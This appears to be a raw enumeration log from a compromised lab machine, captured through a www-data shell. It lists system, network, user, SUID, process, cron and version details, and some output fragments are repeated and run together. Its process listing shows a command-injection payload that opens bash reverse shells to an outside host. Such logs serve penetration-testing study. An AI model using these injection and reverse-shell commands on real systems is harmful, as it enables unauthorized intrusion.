System/Kernel
www-data@ubuntu:/$ uname -a ; cat /etc/*release
Linux ubuntu 4.15.0-134-generic #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.5 LTS"
NAME="Ubuntu"
VERSION="18.04.5 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.5 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic4.15.0-134-genericx86_64Ubuntu 18.04.5 LTS (Bionic Beaver)
Networks
www-data@ubuntu:/$ ip route ; arp -a
default via 192.168.104.254 dev ens192 proto static
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
192.168.104.0/24 dev ens192 proto kernel scope link src 192.168.104.131
_gateway (192.168.104.254) at 00:50:56:9e:fc:4d [ether] on ens192172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
www-data@ubuntu:/$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:35115 0.0.0.0:* LISTEN -
tcp 0 141 192.168.104.131:33736 192.168.45.218:6000 ESTABLISHED 4155/bash
tcp 0 0 192.168.104.131:33658 192.168.45.218:6007 ESTABLISHED 4139/bash
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 127.0.0.1:39037 127.0.0.53:53 ESTABLISHED - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -tcp 0 0 127.0.0.1:35115 0.0.0.0:* LISTEN -
Users & Groups
www-data@ubuntu:/$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
hackzzdogs:x:1000:1000::/home/hackzzdogs:/bin/sh
total 12K
4.0K drwxr-x--x 2 hackzzdogs hackzzdogs 4.0K Feb 3 2021 hackzzdogs
4.0K drwxr-xr-x 3 root root 4.0K Jan 26 2021 .
4.0K drwxr-xr-x 23 root root 4.0K Jan 26 2021 ..hackzzdogs
www-data@ubuntu:/$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=1000(hackzzdogs) gid=1000(hackzzdogs) groups=1000(hackzzdogs)uid=1000(hackzzdogs) gid=1000(hackzzdogs) groups=1000(hackzzdogs)
SUIDs
www-data@ubuntu:/$ find / -perm -04000 -ls -type f 2>/dev/null
267552 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
262636 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
792461 112 -rwsr-xr-x 1 root root 113528 Nov 19 2020 /usr/lib/snapd/snap-confine
266445 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
262569 44 -rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
265209 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
277605 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
265285 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
265282 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
263817 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
265284 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
277604 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
265207 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
265430 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
265350 148 -rwsr-xr-x 1 root root 149080 Sep 23 2020 /usr/bin/sudo
277119 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
265281 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
275555 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
266192 28 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
266190 44 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
265155 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
262177 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su265209 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1265207 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
SGIDs
www-data@ubuntu:/$ find / -type f -perm -02000 -ls 2>/dev/null
409436 12 -rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
276916 44 -rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
266374 356 -rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
275510 16 -rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
265280 72 -rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage
262311 40 -rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
265283 24 -rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry
263772 32 -rwxr-sr-x 1 root tty 30800 Sep 16 2020 /usr/bin/wall
277119 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
524296 36 -rwxr-sr-x 1 root shadow 34816 Jul 21 2020 /sbin/pam_extrausers_chkpwd
524315 36 -rwxr-sr-x 1 root shadow 34816 Jul 21 2020 /sbin/unix_chkpwdCapabilities
www-data@ubuntu:/$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+epProcesses
www-data@ubuntu:/$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.7 77864 7208 ? Ss 17:59 0:01 /sbin/init
root 502 0.0 0.8 94948 8628 ? S<s 17:59 0:00 /lib/systemd/systemd-journald
root 508 0.0 0.1 97716 1392 ? Ss 17:59 0:00 /sbin/lvmetad -f
root 520 0.0 0.5 46960 5240 ? Ss 17:59 0:00 /lib/systemd/systemd-udevd
systemd+ 577 0.0 0.1 141964 1880 ? Ssl 17:59 0:00 /lib/systemd/systemd-timesyncd
systemd+ 600 0.0 0.3 70672 3548 ? Ss 17:59 0:00 /lib/systemd/systemd-resolved
root 737 0.0 0.7 91164 7820 ? Ss 17:59 0:00 /usr/bin/VGAuthService
root 738 0.0 0.6 227056 6416 ? S<sl 17:59 0:04 /usr/bin/vmtoolsd
daemon 748 0.0 0.2 28340 2220 ? Ss 17:59 0:00 /usr/sbin/atd -f
root 751 0.0 0.2 629076 2600 ? Ssl 17:59 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
syslog 752 0.0 0.3 263044 3916 ? Ssl 17:59 0:00 /usr/sbin/rsyslogd -n
root 753 0.0 0.5 287540 5536 ? Ssl 17:59 0:00 /usr/lib/accountsservice/accounts-daemon
root 761 0.0 0.2 31328 2500 ? Ss 17:59 0:00 /usr/sbin/cron -f
root 762 0.0 1.2 170400 12432 ? Ssl 17:59 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
message+ 764 0.0 0.4 50152 4044 ? Ss 17:59 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 839 0.0 0.4 62168 4468 ? Ss 17:59 0:00 /lib/systemd/systemd-logind
root 840 0.0 2.9 673628 29400 ? Ssl 17:59 0:01 /usr/bin/containerd
root 861 0.0 1.3 187244 14068 ? Ssl 17:59 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 862 0.0 0.5 288888 5700 ? Ssl 17:59 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 1102 0.0 5.5 839324 55680 ? Ssl 18:01 0:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 1156 0.0 0.4 72308 4164 ? Ss 18:01 0:00 /usr/sbin/sshd -D
root 1157 0.0 0.1 16188 1600 tty1 Ss+ 18:01 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1194 0.0 0.3 125272 3656 ? Ss 18:01 0:00 /usr/sbin/apache2 -k start
www-data 1195 0.0 4.3 729144 44328 ? Sl 18:01 0:08 /usr/sbin/apache2 -k start
www-data 1196 0.0 1.0 881928 10488 ? Sl 18:01 0:00 /usr/sbin/apache2 -k start
www-data 1197 0.0 1.3 898160 13308 ? Sl 18:01 0:00 /usr/sbin/apache2 -k start
root 1469 0.0 0.2 404808 2548 ? Sl 18:01 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 27017 -container-ip 172.17.0.2 -container-port 27017
root 1475 0.0 0.2 9364 2652 ? Sl 18:01 0:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/85b45169ebbfc0914668fe706828e6f845d143379e73baabcb9e166e9cda08b1 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
999 1491 0.2 8.9 1585412 90600 ? Ssl 18:01 0:20 mongod --bind_ip_all
systemd+ 1838 0.0 0.3 72028 3732 ? Ss 18:01 0:00 /lib/systemd/systemd-networkd
www-data 4136 0.0 0.0 4636 816 ? S 20:20 0:00 sh -c /bin/bash -c 'rm /var/www/html/internal/submissions/$(bash -i >& /dev/tcp/192.168.45.218/6007 0>&1)'
www-data 4137 0.0 0.3 18384 3112 ? S 20:20 0:00 /bin/bash -c rm /var/www/html/internal/submissions/$(bash -i >& /dev/tcp/192.168.45.218/6007 0>&1)
www-data 4139 0.0 0.3 18516 3388 ? S 20:20 0:00 bash -i
www-data 4152 0.0 0.0 4636 832 ? S 20:23 0:00 sh -c /bin/bash -c 'rm /var/www/html/internal/submissions/$(bash -i >& /dev/tcp/192.168.45.218/6000 0>&1)'
www-data 4153 0.0 0.2 18384 3020 ? S 20:23 0:00 /bin/bash -c rm /var/www/html/internal/submissions/$(bash -i >& /dev/tcp/192.168.45.218/6000 0>&1)
www-data 4155 0.0 0.3 18516 3516 ? S 20:23 0:00 bash -i
www-data 4249 0.0 0.3 36708 3208 ? R 20:31 0:00 ps -auxwwwroot 761 0.0 0.2 31328 2500 ? Ss 17:59 0:00 /usr/sbin/cron -froot 840 0.0 2.9 673628 29400 ? Ssl 17:59 0:01 /usr/bin/containerdroot 862 0.0 0.5 288888 5700 ? Ssl 17:59 0:00 /usr/lib/policykit-1/polkitd --no-debugroot 1102 0.0 5.5 839324 55680 ? Ssl 18:01 0:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sockroot 1469 0.0 0.2 404808 2548 ? Sl 18:01 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 27017 -container-ip 172.17.0.2 -container-port 27017root 1156 0.0 0.4 72308 4164 ? Ss 18:01 0:00 /usr/sbin/sshd -Droot 1475 0.0 0.2 9364 2652 ? Sl 18:01 0:00 containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/85b45169ebbfc0914668fe706828e6f845d143379e73baabcb9e166e9cda08b1 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc999 1491 0.2 8.9 1585412 90600 ? Ssl 18:01 0:20 mongod --bind_ip_all
Cron & Systemd
www-data@ubuntu:/$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2025-03-10 02:09:01 UTC 5h 35min left Sun 2025-03-09 18:02:00 UTC 2h 31min ago apt-daily.timer apt-daily.service
Mon 2025-03-10 04:00:00 UTC 7h left Sun 2025-03-09 18:01:55 UTC 2h 31min ago fstrim.timer fstrim.service
Mon 2025-03-10 08:57:55 UTC 12h left Sun 2025-03-09 18:01:55 UTC 2h 31min ago motd-news.timer motd-news.service
Mon 2025-03-10 10:14:32 UTC 13h left Sun 2025-03-09 18:02:01 UTC 2h 31min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2025-03-10 18:14:49 UTC 21h left Sun 2025-03-09 18:14:49 UTC 2h 18min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
5 timers listed.
Pass --all to see loaded but inactive timers, too.Services
www-data@ubuntu:/$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
accounts-daemon.service loaded active running Accounts Service
apache2.service loaded active running The Apache HTTP Server
atd.service loaded active running Deferred execution scheduler
containerd.service loaded active running containerd container runtime
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
docker.service loaded active running Docker Application Container Engine
getty@tty1.service loaded active running Getty on tty1
lvm2-lvmetad.service loaded active running LVM2 metadata daemon
lxcfs.service loaded active running FUSE filesystem for LXC
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-networkd.service loaded active running Network Service
systemd-resolved.service loaded active running Network Name Resolution
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
docker.socket loaded active running Docker Socket for the API
lvm2-lvmetad.socket loaded active running LVM2 metadata daemon socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
34 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.Sudo Version
www-data@ubuntu:/$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2Sudo version 1.8.21p2
Glibc Version
www-data@ubuntu:/$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.4) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Ubuntu GLIBC 2.27-3ubuntu1.4) 2.27